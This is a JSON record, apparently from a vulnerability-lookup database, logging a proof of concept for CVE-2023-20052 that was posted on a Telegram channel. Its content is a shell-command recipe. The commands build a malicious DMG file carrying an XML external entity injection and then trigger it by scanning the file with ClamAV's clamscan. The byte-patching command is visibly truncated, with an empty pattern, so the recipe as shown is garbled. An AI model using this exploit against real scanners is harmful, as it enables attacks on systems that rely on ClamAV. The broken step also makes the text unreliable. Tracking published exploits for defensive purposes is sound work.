{"uuid": "fac75c52-4279-4417-b092-7db2d533f750", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/3447", "content": "\ud83d\udca5CVE-2023-20052 exploit\n\nTo create malicious DMG file:\n\n$ git clone https://github.com/XXXXXXXX/CVE-2023-XXXX.git\n$ cd CVE-2023-20052\n$ sudo docker build -t cve-2023-20052 .\n$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash\n$ genisoimage -D -V \"exploit\" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg\n$ bbe -e 's|| ]>|' -e 's/blkx/&xxe\\;/' test.dmg -o exploit.dmg\nTo trigger exploit:\n\n$ clamscan --debug exploit.dmg", "creation_timestamp": "2023-05-10T15:21:50.000000Z"}